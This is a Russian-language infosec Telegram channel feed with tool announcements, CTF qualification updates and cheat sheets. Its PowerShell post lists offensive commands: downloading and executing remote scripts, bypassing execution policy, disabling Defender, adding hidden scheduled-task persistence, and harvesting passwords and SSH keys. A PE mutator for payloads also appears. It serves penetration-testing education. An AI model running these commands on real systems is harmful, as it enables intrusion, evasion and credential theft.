Whitehat Lab
2.08K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
👋 Добрый день товарищи!

Напоминаю, что по адресу @whitehat_chat находится чатик, в котором можно пообщаться и задать интересующие вас вопросы, так же там "живет" бот, обладающий полезным функционалом:

▪️Определяем тип хеша
!hash a6105c0a611b41b08f1209506350279e


▪️Поиск эксплоитов по названию
!ss Microsoft Exchange 2019


▪️Поиск эксплоитов (PoC) по CVE
!poc CVE-2023-46604


▪️Узнаем пароль по базе (MD5, NTLM, SHA1 или SHA256)
!check_hash a6105c0a611b41b08f1209506350279e


▪️Проверка доступности порта
!port ya.ru 80


▪️Список мостов для Tor
!bridges


▪️Бот обратной связи
!feedback


▪️Генерация qr кода
!qr https://t.iss.one/wh_lab


▪️Бот для определения ID файлов, эмодзи, сообщений и т.д. (полезен для разработчиков ботов)

🤖 Get Any IDs

#bot #chat

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
632🔥1
😎 Квалификация на Standoff 15

Я, понятное дело за HackerLab 😎 🚩
Проходят 5 команд

Реализовано 13 из 24 критических событий
Всем успехов и немного удачи!

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9221
🔄 🖥 URLFinder v0.0.3

Высокоскоростной инструмент для пассивного сбора и эффективного обнаружения URL-адресов. От создателей nuclei, написан на 💻

UPD. Добавили scope контроль:

SCOPE:
-us, -url-scope string[] in scope url regex to be followed by urlfinder
-uos, -url-out-scope string[] out of scope url regex to be excluded by urlfinder
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling


Установка:

go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest


Запуск:

urlfinder -d tesla.com

# Match и filter
urlfinder -d tesla.com -m support -f faq

urlfinder -d tesla.com -m include-patterns.txt -f exclude-patterns.txt

# JSON export
urlfinder -d tesla.com -j


🖥 Home

#urlfinder #soft #golang #web #pentest

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍32
😎 Квалификация на Standoff 15

2ой день отборов
Проходят 5 команд

Реализовано 17 из 24 критических событий

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥71
🔄🔎 HAITI (hash identifier) v3.0.0

Один из лучших инструментов для определения типа хеша. Написан на 💻 Ruby

UPD.
Вышло большое обновление до мажорной 3.0.0 версии - changelog

Поддержка 641 хеша
7 новых типов хешей
Множественные улучшения (описания и исправления для JtR и HC)
Поддержка Ruby 3.4


⚙️ Возможности:

Поддержка современных алгоритмов (SHA3, Keccak, Blake2, etc.)
Показывает формат для Hashcat и JohntheRipper
Работает как приложение и библиотека


Установка
:

gem install haiti-hash

Примеры:

haiti 786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce


SHA-512 [HC: 1700] [JtR: raw-sha512]
SHA3-512 [HC: 17600] [JtR: raw-sha3]
SHA3-512 [HC: 17600] [JtR: dynamic_400]
Keccak-512 [HC: 18000] [JtR: raw-keccak]
BLAKE2-512 [JtR: raw-blake2]
Whirlpool [HC: 6100] [JtR: whirlpool]
Salsa10
Salsa20
Skein-512 [JtR: skein-512]
Skein-1024(512)


Библиотека:

require 'haiti'

# Instantiate a HashIdentifier object that will automatically identify
# the hash type
hi = HashIdentifier.new('786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce')

# Loop over the hash type candidates and retrieve data
hi.type.each do |type|
name = type.name
hashcat_id = type.hashcat
john_ref = type.john
extended = type.extended
samples = type.samples
end


💻 Docs
💻 Home
➡️ Site

#haiti #hash #soft #ruby

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
✖️ Astral-PE 1.5.5

Протектор для 💻 Windows PE файлов
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export

⚙️ Использование:

./Astral-PE.exe payload.exe -o payload_clean.exe


😹 Home
😹 Download

#astralpe #mutator

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
62
🖥 OWASP SamuraiWTF 5.3

Виртуальная лаборатория, основанная на 🐧 для тренировки веб пентеста с открытым исходным кодом

Предустановленные лабы и инструменты:

▪️ OWASP Juice Shop
▪️ WebGoat
▪️ Mutillidae
▪️ bWAPP
▪️ DVWA
▪️ Burp Suite
▪️ Nikto
▪️ SQLMap


➡️ Home
➡️ Download
🖥 Source
🖥 Docs

#web #pentest #samurai

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
9211
💻 progress v0.17 - Coreutils Progress Viewer

Показывает прогресс многих Coreutils инструментов, cp, mv, dd, tar, gz и т.д.

Установка в 🐧 Debian like:

sudo apt install progress


Использование:

watch progress -q
progress -w
watch progress -wc firefox
progress -c httpd
cp bigfile newfile & progress -mp $!


💻 Home

#progress #coreutils

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5211
😎 Квалификация на Standoff 15

Заключительный день отборов
В финал пройдут 5 команд
🚩 HackerLab вперёд!

Отчеты принимаются до 22.00

Реализовано 22 из 24 критических событий

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1021
😎 Квалификация на Standoff 15

⌨️ Поздравляю первую пятерку команд с проходом в финальную стадию

🚩 HackerLab красавчики, всем респект!

Реализовано 22 из 24 критических событий

2 нерешенных таска объявляю лютейшей уцуцугой 🧙

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥3
🏃 Powershell Tips & Tricks

Для выполнения некоторых командлетов необходим импортированный AD модуль

🖥 ADModule

Подключаем:

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory


Информация о системе
:

Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *


Список процессов:

Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending


FailureAudit в логах:

Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}


Сканер портов:

1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }


Выполнить команду на удаленном ПК:

Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)


Скачать и выполнить скрипт:

$url = 'https://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)


Execution policy bypass:

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1


Список доменных юзеров:

# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate


Список залогиненых юзеров:

Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username


Давно не логинились, но УЗ включена:

# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name


Прибить процесс:

Get-Process -Name "Notepad" | Stop-Process -Force


Список установленного ПО:

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate


Мониторинг изменений ФС
:

$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }


Отключаем Defender:

Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true


Задание в планировщик для закрепа:

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'


Поиск паролей в текстовых файлах:

Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive


Собираем SSH ключи:

Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse


Продолжение следует

#powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍832
🤨 Искал медь, а нашёл золото

Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!

Внутри репозитория:
➡️Scanners — сканеры уязвимостей;
➡️Custom Features — уникальные доработки для Burp Suite;
➡️Beautifiers and Decoders — форматирование и декодирование данных;
➡️Cloud Security — тестирование облачных сервисов;
➡️Scripting — расширения для работы со скриптами и автоматизации тестирования;
➡️OAuth and SSO — инструменты для тестирования аутентификации;
➡️Information Gathering — сбор информации о целевой системе;
➡️Vulnerability Specific Extensions — инструменты под конкретные уязвимости;
➡️Web Application Firewall Evasion — обход систем веб-защиты;
➡️Logging and Notes — ведение логов и заметок во время тестов;
➡️Payload Generators and Fuzzers — генераторы полезных нагрузок и фаззеры;
➡️Cryptography — инструменты для работы с шифрами/хэшами;
➡️Tool Integration — расширения, связанные с интеграцией Burp Suite с другим программным обеспечением/инструментами;
➡️Misc — разные полезные расширения;
➡️Burp Extension Training Resources — обучающие материалы по работе с расширениями.

А какие добавленные расширения вам больше всего понравились?

🔗 Ссылка на подборку расширений Burp Suite
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥2
⚙️ bat v0.25.0

Клон cat'a с поддержкой подсветки синтаксиса
Кроссплатформенный, написан на 💻 Rust

По умолчанию работает как утилита less с построчным выводом. Для отключения можно сделать alias:

alias cat='bat --paging=never'


Основную функцию - конкатенацию, выполняет

bat 1.txt 2.txt 3.txt > merged.txt


🐧 Установка в Debian like:

wget https://github.com/sharkdp/bat/releases/download/v0.25.0/bat-musl_0.25.0_musl-linux-amd64.deb

sudo dpkg -i bat-musl_0.25.0_musl-linux-amd64.deb


Если будете ставить через sudo apt install bat в зависимости от дистрибутива утилита может называться batcat

💻 Установка в Windows:

winget install sharkdp.bat


⚙️ Использование:

# Несколько файлов
bat src/*.rs

# Из stdin
curl -s https://sh.rustup.rs | bat

# Показать непечатные символы
bat -A /etc/hosts

tail -f /var/log/pacman.log | bat --paging=never -l log


💻 Home

#bat #soft #rust

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
И еще один хороший материал подъехал пол часа назад)

В блоге рассматривается шифрование MSSQL Server и методы подбора ключей.

https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/

Что еще прикольное узнали из блога: ManageEngine ADSelfService по умолчанию использует ключ, который Microsoft показывает в качестве примера в своей справке😁 прикол конечно...

#pentest #redteam #sql #ad
8
🖼️ Commands cheat sheet

# Get commands with basic output
kubectl get services
kubectl get pods --all-namespaces
kubectl get pods -o wide
kubectl get deployment my-dep
kubectl get pods
kubectl get pod my-pod -o yaml

# Describe commands with verbose output
kubectl describe nodes my-node
kubectl describe pods my-pod

# List Services Sorted by Name
kubectl get services --sort-by=.metadata.name

# List pods Sorted by Restart Count
kubectl get pods --sort-by='.status.containerStatuses[0].restartCount'

# List PersistentVolumes sorted by capacity
kubectl get pv --sort-by=.spec.capacity.storage

# Get the version label of all pods with label app=cassandra
kubectl get pods --selector=app=cassandra -o \
jsonpath='{.items[*].metadata.labels.version}'

# Retrieve the value of a key with dots, e.g. 'ca.crt'
kubectl get configmap myconfig \
-o jsonpath='{.data.ca\.crt}'

# Retrieve a base64 encoded value with dashes instead of underscores.
kubectl get secret my-secret --template='{{index .data "key-name-with-dashes"}}'

# Get all worker nodes (use a selector to exclude results that have a label
# named 'node-role.kubernetes.io/control-plane')
kubectl get node --selector='!node-role.kubernetes.io/control-plane'

# Get all running pods in the namespace
kubectl get pods --field-selector=status.phase=Running

# Get ExternalIPs of all nodes
kubectl get nodes -o jsonpath='{.items[*].status.addresses[?(@.type=="ExternalIP")].address}'

# List Names of Pods that belong to Particular RC
# "jq" command useful for transformations that are too complex for jsonpath, it can be found at https://jqlang.github.io/jq/
sel=${$(kubectl get rc my-rc --output=json | jq -j '.spec.selector | to_entries | .[] | "\(.key)=\(.value),"')%?}
echo $(kubectl get pods --selector=$sel --output=jsonpath={.items..metadata.name})

# Show labels for all pods (or any other Kubernetes object that supports labelling)
kubectl get pods --show-labels

# Check which nodes are ready
JSONPATH='{range .items[*]}{@.metadata.name}:{range @.status.conditions[*]}{@.type}={@.status};{end}{end}' \
&& kubectl get nodes -o jsonpath="$JSONPATH" | grep "Ready=True"

# Check which nodes are ready with custom-columns
kubectl get node -o custom-columns='NODE_NAME:.metadata.name,STATUS:.status.conditions[?(@.type=="Ready")].status'

# Output decoded secrets without external tools
kubectl get secret my-secret -o go-template='{{range $k,$v := .data}}{{"### "}}{{$k}}{{"\n"}}{{$v|base64decode}}{{"\n\n"}}{{end}}'

# List all Secrets currently in use by a pod
kubectl get pods -o json | jq '.items[].spec.containers[].env[]?.valueFrom.secretKeyRef.name' | grep -v null | sort | uniq

# List all containerIDs of initContainer of all pods
# Helpful when cleaning up stopped containers, while avoiding removal of initContainers.
kubectl get pods --all-namespaces -o jsonpath='{range .items[*].status.initContainerStatuses[*]}{.containerID}{"\n"}{end}' | cut -d/ -f3

# List Events sorted by timestamp
kubectl get events --sort-by=.metadata.creationTimestamp

# List all warning events
kubectl events --types=Warning

# Compares the current state of the cluster against the state that the cluster would be in if the manifest was applied.
kubectl diff -f ./my-manifest.yaml

# Produce a period-delimited tree of all keys returned for nodes
# Helpful when locating a key within a complex nested JSON structure
kubectl get nodes -o json | jq -c 'paths|join(".")'

# Produce a period-delimited tree of all keys returned for pods, etc
kubectl get pods -o json | jq -c 'paths|join(".")'

# Get a deployment's status subresource
kubectl get deployment nginx-deployment --subresource=status

# dump pod logs
kubectl logs my-pod

# dump pod logs, with label name=myLabel
kubectl logs -l name=myLabel

# dump pod logs for a previous instantiation
kubectl logs my-pod --previous

# dump pod container logs (stdout, multi-container case)
kubectl logs my-pod -c my-container

kubectl logs -l name=myLabel -c my-container
kubectl logs my-pod -c my-container --previous
kubectl logs -f my-pod


#kuber #k8s #kubectl #cheatsheet

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
51
💻 NTLM Relay атаки: все, что вам необходимо знать

⌨️ Очень большая и подробная статья на английском языке. Рекомендую к прочтению!

✍️ NTLM Relay Attacks

⚙️ Инструменты:

😹 Responder
😹 Inveigh
😹 PetitPotam
😹 Rubeus
😹 Sharpmad

#windows #relay #ntlm #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍2🔥1
💻 Living off the Foreign Land Cmdlets and Binaries

Неплохая шпаргалка по бинарным файлам, 💻Powershell командлетам и mmc оснасткам

😉 LOFLCAB
😹 Home

#windows #redteam #powershell #mmc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 😀 CATS v13.1.1 (Contract API Testing and Security)

Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на 💻 Java

UPD. Большое обновление отличного инструмента до 13ой версии - notes

Запуск в режиме black box:

cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k


Запуск в режиме context mode:

cats --contract=openapi.yaml --server=https://localhost:8080 --headers=headers.yml --refData=referenceData.yml


Запуск в режиме continuous fuzzing:

cats random --contract=openapi.yaml --server=https://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10


💻 Github
💻 Download
📔 Docs
📚 Тестируем Github API с CATS

#soft #cats #java #fuzzer

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Forwarded from Adaptix Framework
Начал писать версию 0.4. Очень много нужно поменять в архитектуре экстендеров.

А пока покажу вот такие прикольные расширения: иногда легче "попросить" у пользователя учетные данные, нежели откуда-то извлекать)

P.S. pr на гите для расширений принимаются
🔥103
Каков путь ? Только честно! 😄
Anonymous Poll
50%
Whitehat
21%
Blackhat
17%
Greyhat
11%
Другое, в комментарии
5421